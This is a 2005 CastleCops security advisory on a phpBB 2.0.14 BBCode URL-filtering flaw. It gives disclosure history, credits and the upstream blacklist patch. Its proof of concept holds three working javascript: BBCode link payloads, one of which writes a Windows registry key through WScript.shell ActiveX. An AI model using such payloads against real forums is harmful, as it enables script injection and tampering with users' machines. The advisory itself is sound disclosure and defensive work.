*CASTLECOPS.COM SUMMARY bbcode input validation Severity: High CastleCops: http://castlecops.com/t123194-.html CVE: CAN-2005-1193 phpBB Security ID#: 266 Bugtraq ID#: 13545 Secunia #: 15298 US-CERT VU#: 113196 SecurityTracker #: 1013918 Vulnerable: viewtopic.php, privmsg.php for phpBB 2.0.14 (possible all lower versions too), and other files that rely on bbcode.php Fix: Upgrade to 2.0.15 *INTRODUCTION phpBB is a popular bulletin board system based on PHP. There is a lack of filtering for the BBCODE URL. Initially discovered: encapsulating a specially crafted URL, a user caught clicking on the resulting hyperlinks can have their registry entries modified without their knowledge [huge hazard!], among other things. Originally successfully tested with "javascript://", but subsequent discovery showed that "applet://", "about://", "activex://", "chrome://", and "script://" may be able to get thru as well with the URL enclosure or not (of course, browser dependant). It is recommended that these types of URIs not be allowed to render at all in the phpBB system as the possible user computer hijacking can be gargantuan. There is enough hijacking in spyware products (ref: http://castlecops.com/f67-Hijackthis_Spyware_Viruses_Worms_Trojans_Oh_My.html ). *PROOF OF CONCEPT This POC uses the URL encapsulation: [url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url] [url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22);window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url] [url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url] If you click on the second link, be sure to find and remove the "QQQQQ" entry in your Windows Registry. However, we recommend you do not click expect for developer testing and patching. *FIX The CastleCops suggested patch was integrated into bbcode.php. That suggested patch is within the includes/bbcode.php file, bbencode_second_pass function, after the global line (and a second location): + $text = preg_replace('#(script|about|applet|activex|chrome):#is',"\\1:",$text); This particular patch replaces the colon with its decimal equivalent and will bypass hyperlink creation on viewing a topic or a private message. Both the POC and patch have been tested on some sites with success. This patch has been included in the phpbb 2.0.15 release. Please be sure to read the release in its entirety for the precise update: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194 *COMMENTARY Possible alternative patches? Modsecurity adds a nice layer of security in filtering requests to a website. However, the links above in the POC clearly show the web server may not process them as they are client side driven. Modsecurity would not help in the examples above. Whitelisting is another method, however it was decided to utilize the blacklist above by phpbb. *WEB BROWSERS USED Basic tests were done using Firefox and Internet Explorer. Your own mileage may vary. *CREDITS Discovery and patch by Papados and Paul Laudanski at http://castlecops.com *HISTORY Vendor A: phpbb.com Date Discovered: 20 Apr 2005 Patch Given: 20 Apr 2005 Vendor Notified: 20 Apr 2005 Acknowledged: 20 Apr 2005 Patch Released: 7 May 2005 Pre-Full Disclosure: 8 May 2005 Full Disclosure: 02 Jun 2005 Vendor B: (nameless) Vendor Notified: 12 May 2005 Acknowledged: 12 May 2005 Responded: 26 May 2005 (Deemed a non-issue) *DISCLAIMER AND LICENSE ALL SUCH INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES ARE PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. CASTLECOPS, ITS AFFILIATES, AND/OR THEIR RESPECTIVE SUPPLIERS HEREBY DISCLAIM ALL WARRANTIES AND CONDITIONS WITH REGARD TO THIS INFORMATION, SOFTWARE, PRODUCTS, AND SERVICES, INCLUDING ALL IMPLIED WARRANTIES AND CONDITIONS OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, TITLE, AND NONINFRINGEMENT. Subject to terms in the CastleCops AUP: http://castlecops.com/article1.html. -- Sincerely, Paul Laudanski .. Computer Cops, LLC. Microsoft MVP Windows-Security 2005 CastleCops(SM)... http://castlecops.com CCWiki .......... http://wiki.castlecops.com CCForums ........ http://castlecops.com/forums.html BHO/Toolbars: http://castlecops.com/CLSID.html Windows XP/NT Services: http://castlecops.com/O23.html Extra IE Buttons: http://castlecops.com/O9.html Layered Service Providers: http://castlecops.com/LSPs.html StartupList: http://castlecops.com/StartupList.html ________ Information from Computer Cops, L.L.C. ________ This message was checked by NOD32 Antivirus System for Linux Mail Server. part000.txt - is OK http://castlecops.com